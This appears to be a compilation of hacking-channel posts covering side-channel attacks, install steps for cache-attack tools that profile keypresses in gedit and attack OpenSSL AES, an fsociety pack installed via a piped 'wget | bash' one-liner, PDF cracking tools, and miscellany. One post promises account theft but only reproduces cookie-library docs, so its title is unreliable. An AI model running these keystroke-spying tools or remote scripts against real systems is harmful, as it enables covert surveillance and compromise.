▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Side-Channel Attack ?
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> A side-channel attack (SCA) is a security exploit that involves collecting information about what a computing device does when it is performing cryptographic operations and using that information to reverse engineer the device's cryptography system.

> In computing, a side channel is any communication channel that is incidental to another communication channel. Security researcher Paul Kocher is credited with coining the term side-channel attack in the 1990s when he discovered it was possible to reverse engineer security tokens by monitoring a computer's power consumption and electromagnetic emissions.

> Unlike many other types of security exploits, side-channel attacks are hardware and software agnostic. Instead of targeting a software vulnerability caused by a coding error or configuration drift, the attacker exploits the way the device's operating system (OS) accesses the hardware upon which the OS runs. Side-channel attacks can be launched against any operating system, including Windows and Linux.

Powred by wii Wiki
@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑ALL Types of Side-Channel Attacks
instagram.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> Side-channel attacks work by monitoring the emissions produced by electronic circuits when the victim's computer is being used. In addition to exploiting information about power consumption and electromagnetic fields, an attacker may actually listen to the sounds a central processing unit (CPU) produces and use that information to reverse engineer what the computer is doing. This type of side-channel attack is called an acoustic cryptanalysis attack. Other types of side-channel attack include:

1) Cache attacks that exploit how and when cache is accessed in a physical system.

2) Differential fault analysis attacks that seek to gleam information from a system by introducing faults into the system’s computations.

3) Timing attacks that track the movement of data to and from a system's CPU and memory.

4) Thermal-imaging attacks that use infrared images to observe the surface of a CPU chip and collect executed code.

5) Optical side-channel attacks that collect information about hard disk activity by using a audio/visual recorder, such as a video camera.

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Advanced Side-Channel Analysis Toolfirst step for attack ( tested ):
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/Ledger-Donjon/lascar

2) cd lascar

3) python3 setup.py install --user

4) cd docs/

5) make html

🦑Requirements :

> numpy
> scipy
>matplotlib: for curve visualization
>vispy: for curve visualization
>sklearn: for machine learning
>keras: for deep learning
>tensorflow: keras backend
>h5py: for data storage
>progressbar2
>pytest
>numba

🦑Tutorial:
> https://github.com/Ledger-Donjon/lascar/blob/master/tutorial/01-discovering-containers.py
>https://github.com/Ledger-Donjon/lascar/blob/master/tutorial/07-session-dpa-example.py

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Dangerous tools to perform Cache Template Attacks
twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/IAIK/cache_template_attacks

2) cd cache_template_attacks

3) cd calibration

4) make

5) ./calibration

🦑Running :

1) Automated keypress profiling

> cd profiling/linux_low_frequency_example

> make

> ./spy.sh 5 200 gedit # in our example we profile keypresses in gedit

2) Keypresses (with libxdotool)
In this example we perform some steps by hand to illustrate what happens in the background. Therefore, we will first find the address range to attack:

> $ cat /proc/ps -A | grep gedit | grep -oE "^[0-9]+"/maps | grep r-x | grep gdk-3
7fc963a05000-7fc963ab4000 r-xp 00000000 fc:01 2637370 /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2

3) Switch to an already opened gedit window before ./spy is started. On Linux, run the following lines:

> cd profiling/linux_low_frequency_example

>make

> echo "switch to gedit window"

>sleep 5; ./spy 200 7fc963a05000-7fc963ab4000 r-xp 00000000 fc:01 2637370 /usr/lib/x86_64-linux-gnu/libgd

4) On Windows with MSYS/MinGW, run the following lines:

> cd profiling/windows_low_frequency_example

> mingw32-make

>echo "switch to notepad window"

> sleep 5; ./spy 200 C:\Windows\System32\notepad.exe > notepad.csv

5) This one had 126 cache hits during 122 key presses of the key N. And almost none when pressing other keys.

To verify our results we will now use the generic exploitation spy tool:

> cd exploitation/generic

> make

> ./spy /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2 0x85ec0

6) OpenSSL AES T-Table attack
This example requires a self-compiled OpenSSL library to enable it's T-Table-based AES implementation. Place libcrypto.so in the same folder and make sure the program actually uses it as a shared library. Then run

> cd profiling/aes_example
>make
>./spy

🦑Fully automated attack
In this example we will run a script which will automatically execute the profiling phase as described before and then switch to the multi_spy exploitation tool as soon as a result is available.

Then run

1) cd exploitation/multi_spy

2) make

3) cd ../../profiling/linux_low_frequency_automated

4) ./spy.sh 5 200 /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑hOW Does Attackers got all accounts(netflix/spootify/steam...) for victims without their knowledge Tuto buy UndercOde
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/js-cookie/js-cookie

2) cd js-cookie

3) npm i js-cookie

4) Create a cookie, valid across the entire site:

Cookies.set('name', 'value')

5) Create a cookie that expires 7 days from now, valid across the entire site:

Cookies.set('name', 'value', { expires: 7 })
Create an expiring cookie, valid to the path of the current page:

Cookies.set('name', 'value', { expires: 7, path: '' })

6) Read cookie:

Cookies.get('name') // => 'value'
Cookies.get('nothing') // => undefined

7) Read all visible cookies:

Cookies.get() // => { name: 'value' }
Note: It is not possible to read a particular cookie by passing one of the cookie attributes (which may or may not have been used when writing the cookie in question):

Cookies.get('foo', { domain: 'sub.example.com' }) // domain won't have any effect...!

8) The cookie with the name foo will only be available on .get() if it's visible from where the code is called; the domain and/or path attribute will not have an effect when reading.

9) Delete cookie:

Cookies.remove('name')

10) Delete a cookie valid to the path of the current page:

Cookies.set('name', 'value', { path: '' })
Cookies.remove('name') // fail!
Cookies.remove('name', { path: '' }) // removed!

> IMPORTANT! When deleting a cookie and you're not relying on the default attributes, you must pass the exact same path and domain attributes that were used to set the cookie:

Cookies.remove('name', { path: '', domain: '.yourdomain.com' })

USE FOR LEARNING ONLY

Written by UndercOde

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Enjoy on
T.me/UndercOdeTestingOfficial

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2019 new update Octant is a great tool for developers to understand how applications run on a Kubernetes cluster. It aims to be part of the developer's toolkit for gaining insight and approaching complexity found in Kubernetes. Octant offers a combination of introspective tooling, cluster navigation, and object management along with a plugin system to further extend its capabilities.
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

On Any Debian base Os :(kali/parrot...)
1) Download https://github.com/vmware-tanzu/octant/releases/download/v0.9.1/octant_0.9.1_Linux-64bit.deb

2) cd Downloads

3) dpkg -i (name of Downloaded File)

🦑For Windows :

1) install using chocolatey with the following one-liner:

> choco install octant --confirm

2) Scoop

Add the extras bucket.

> download https://github.com/lukesampson/scoop-extras
+ cmd run :

> scoop bucket add extras

3) Install using scoop.

> scoop install octant

🦑Mac os

> brew install octant

🦑If You Download The .zip From release page :
> https://github.com/vmware-tanzu/octant/releases

1) tar -xzvf ~/Downloads/octant_0.X.Y_Linux-64bit.tar.gz

(octant_0.X.Y_Linux-64bit/README.md
octant_0.X.Y_Linux-64bit/octant)

2) Verify it runs:

3) ./octant_0.X.Y_Linux-64bit/octant version

🦑Tested by UndercOcde :

> Ubanto

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑fsociety Hacking Tools Pack – A Penetration Testing Framework
2019 updated termux/Linux/windows
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/Manisso/fsociety

2) cd fsociety

3) chmod 777 install.sh

4) bash install.sh

or
> bash <(wget -qO- https://git.io/vAtmB)

🦑Features:

Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
(for wordpress/wifi &...)

E N J O Y

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 For Fast Money 😁
Exploiting Bitcoin prices patterns with Deep Learning
>Exploiting Bitcoin prices patterns with Deep Learning. Like OpenAI, we train our models on raw pixel data. Exactly how an experienced human would see the curves and takes an action.
t.me/UndercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/philipperemy/deep-learning-bitcoin.git

2) cd deep-learning-bitcoin

3) ./data_download.sh # will download it to /tmp/

4) python3 data_generator.py /tmp/btc-trading-patterns/ /tmp/

5) coinbaseUSD.csv 1 # 1 means we want to use quantiles on returns. 0 would mean we are interested if the bitcoin goes UP or DOWN only.

6) f you are interested into building a huge dataset (coinbase.csv contains around 18M rows), it's preferrable to run the program in background mode:

> nohup python3 -u data_generator.py /tmp/btc-trading-patterns/ /tmp/coinbaseUSD.csv 1 > /tmp/btc.out 2>&1 &
tail -f /tmp/btc.out


🦑Full Process :

1) Download Bitcoin tick data(in install & run section)

2) Convert to 5-minute data

3) Convert to Open High Low Close representation

4) Train a simple AlexNet on 20,000 samples: accuracy is 70% for predicting if asset will go UP or DOWN. Training is done on NVIDIA DIGITS and with the Caffe framework.

5) Quantify how much the price will go UP or DOWN. Because the price can go UP by epsilon percent 99% of the time, and pulls back by 50%
Train on 1,000,000+ samples (at least)

6) Apply more complex Conv Nets (at least Google LeNet)
Integrate bar volumes on the generated OHLC (Open, High, Low, Close) image

7) Use CNN attention to know what's important for which image. Maybe only a fraction of the image matters for the prediction

🦑Illustration of the dataset from CoinbaseUSD

close_price_returns close_price_returns_bins close_price_returns_labels
DateTime_UTC
2017-05-29 11:55:00 2158.86 2160.06 2155.78 2156.00 21.034283 0.000000 (-0.334, 0.015] 5
2017-05-29 12:00:00 2155.98 2170.88 2155.79 2158.53 47.772555 0.117347 (0.015, 0.364] 6
2017-05-29 12:05:00 2158.49 2158.79 2141.12 2141.92 122.332090 -0.769505 (-1.0322, -0.683] 3
2017-05-29 12:10:00 2141.87 2165.90 2141.86 2162.44 87.253402 0.958019 (0.713, 1.

ENJOY OUR TUTORIALS

@UnderCodeTestingOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOOLS LIST PDF TOOLS New (BRUTEFORCE PROTECTED PDF/PAYLOADS/INJECTION....)
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

Tool URL

AnalyzePDF.py https://github.com/hiddenillusion/AnalyzePDF
ByteForce https://github.com/weaknetlabs/ByteForce
Caradoc https://github.com/ANSSI-FR/caradoc
Didier Stevens suite https://github.com/DidierStevens/DidierStevensSuite
dumppdf https://packages.debian.org/jessie/python-pdfminer
forensics-all https://packages.debian.org/jessie-backports/forensics-all
Origami https://code.google.com/archive/p/origami-pdf/
ParanoiDF https://github.com/patrickdw123/ParanoiDF
peepdf https://github.com/jesparza/peepdf
PDF Xray https://github.com/9b/pdfxray_public
pdf-parser http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
pdf2jhon.py https://github.com/magnumripper/JohnTheRipper/blob/unstable-jumbo/run/pdf2john.py
pdfcrack https://packages.debian.org/jessie/pdfcrack
pdfextract https://github.com/CrossRef/pdfextract
pdfobjflow.py https://bitbucket.org/sebastiendamaye/pdfobjflow
pdfresurrect https://packages.debian.org/jessie/pdfresurrect
PdfStreamDumper.exe http://sandsprite.com/CodeStuff/PDFStreamDumper_Setup.exe
pdftk https://packages.debian.org/en/jessie/pdftk
pdfxray_lite.py https://github.com/9b/pdfxray_lite
poppler-utils https://packages.debian.org/en/jessie/poppler-utils (pdftotext, pdfimages, pdftohtml, pdftops, pdfinfo, pdffonts, pdfdetach, pdfseparate, pdfsig, pdftocairo, pdftoppm, pdfunite)
pyew https://packages.debian.org/en/jessie/pyew
qpdf https://packages.debian.org/jessie/qpdf
swf_mastah.py https://github.com/9b/pdfxray_public/blob/master/builder/swf_mastah.py

e n j o y

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑.INI File Extension types/kinds...
instagram.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Windows Initialization File

>An INI file is a configuration file used by Windows programs to initialize program settings. It contains sections for settings and preferences (delimited by a string in square brackets) with each section containing one or more name and value parameters.

> desktop.ini - A hidden file located in Windows folders that saves viewing options for that specific folder. This file can specify an image that is used for the folder icon as well as appearance options for files within the folder. It can be ignored, but if you delete the desktop.ini file, Windows may generate a new one. Mac OS X .DS_STORE files serve a similar purpose.

> INI files can be edited with a plain text editor, but typically should not be edited or altered by regular users. INI files were partially replaced by the registry database in Windows 95. More recently, they have also been replaced by XML files.

2) Symbian OS Configuration File

>Configuration file that stores settings and user preferences for the Symbian operating system and installed applications; similar to INI files used by Windows and typically should not be opened manually.

3) Gravis UltraSound Bank Setup File

> Contains settings for a Gravis UltraSound sound bank (.FFF file) as well as patch files used by Gravis sound cards.

4) Finale Preferences File

>File created by Finale, a music notation program; contains Finale program settings to customize the work environment; settings include dialog boxes, menu settings, and font styles; preset in Finale but can be edited either through settings dialog windows or manually.

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁